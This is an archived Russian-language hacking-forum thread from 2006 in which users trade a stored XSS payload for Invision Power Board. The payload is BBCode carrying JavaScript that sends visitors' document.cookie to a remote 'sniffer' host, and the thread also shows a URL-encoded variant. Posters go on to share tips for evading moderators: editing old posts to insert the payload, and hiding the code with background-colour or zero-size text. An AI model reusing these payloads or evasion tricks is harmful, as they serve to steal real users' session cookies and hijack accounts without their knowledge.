ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Вопрос по эксплойту для Ipb 2.1.1.
   
Ответ
Страница 3 из 3 < 1 2 3
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 02.01.2006, 23:05
maXaTTAck
Новичок
Регистрация: 06.09.2005
Сообщений: 9
Провел на форуме:
56103

Репутация: 0
По умолчанию
Помог такой код:

Код HTML:
[EMAIL]wj@wj.com[URL=wj/style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/URL][/EMAIL]
Вопрос: А как закодировать в такие вот коды сниффер http://s.netsec.ru/sec/pic.gif

Имеется в виду символы адреса в код
Последний раз редактировалось maXaTTAck; 02.01.2006 в 23:28..
 
Ответить с цитированием

  #22  
Старый 02.01.2006, 23:10
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


По умолчанию
Код:
%5BEMAIL%5Dwj@wj.com%5BURL%3Dwj/style%3Dbackground%3Aurl%28javascript%3Adocument.images%5B1%5D.src%3D%22http%3A//s.netsec.ru/sec/pic.gif%3F%22document.cookie%29%3B%20%5D%5B/URL%5D%5B/EMAIL%5D

На вот так вроде!
Последний раз редактировалось •••™NO FEAR™•••; 02.01.2006 в 23:30..
 
Ответить с цитированием

  #23  
Старый 02.01.2006, 23:16
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию
Можеш тут _http://webmastertools.narod.ru/OnlineTools/url_decode.html , поменяй сылку на снифер _http://antichat.ru/cgi-bin/s.jpg на http://s.netsec.ru/sec/pic.gif , и кодируй.
 
Ответить с цитированием

  #24  
Старый 13.01.2006, 19:06
Zheca
Познающий
Регистрация: 18.12.2005
Сообщений: 84
Провел на форуме:
540410

Репутация: 5
Отправить сообщение для Zheca с помощью ICQ
По умолчанию
А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно
 
Ответить с цитированием

  #25  
Старый 13.01.2006, 19:39
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Цитата:
Сообщение от Zheca  
А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно
Ты получаешь куки только с той страницы на которой отображается твоё сообщение. Сомневаюсь что многие будут листать топик назад и читать, допустим вторую его страницу, а не последнии сообщения, допустим на десятой.
__________________
Full DNS report
 
Ответить с цитированием

  #26  
Старый 13.01.2006, 19:45
Zheca
Познающий
Регистрация: 18.12.2005
Сообщений: 84
Провел на форуме:
540410

Репутация: 5
Отправить сообщение для Zheca с помощью ICQ
По умолчанию
Это понятно - это будет работать? - или нужно обязательно создавать новый пост?
 
Ответить с цитированием

  #27  
Старый 13.01.2006, 20:17
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Будет, при условии что оно отобразится на страничке у жертвы.
__________________
Full DNS report
 
Ответить с цитированием

  #28  
Старый 13.01.2006, 22:05
Zheca
Познающий
Регистрация: 18.12.2005
Сообщений: 84
Провел на форуме:
540410

Репутация: 5
Отправить сообщение для Zheca с помощью ICQ
По умолчанию
Эт я к вопросам по поводу того, что текст кода виден из других браузеров - и админ удаляет посты. Ведб это выход - запостится, подождать пока накопятся сообщения, и пока не совершился переход на следующую страницу - изменить свой первый пост вставив туда код. Пару, тройку юзеров можно поймать вот таким образом
 
Ответить с цитированием

  #29  
Старый 28.01.2006, 00:16
Humor
Banned
Регистрация: 26.01.2006
Сообщений: 19
Провел на форуме:
22474

Репутация: 0
По умолчанию
Цитата:
Сообщение от slime  
Если что-то остается, то можно замаскировать под цвет фона хы-хы...
но хз... у мя ничего не оставалось никогда...

по поводу глазастых админов...
не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом....

оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано.
Нет это не правильно, прочти http://forum.antichat.ru/showthread.php?t=11807 Я дал пример как это можно реальзивать. ` тут СОВСЕМ не причем!
 
Ответить с цитированием
Ответ
Страница 3 из 3 < 1 2 3



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос по чатам от http://www.maxchat.ru Чаты 3 21.12.2002 08:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ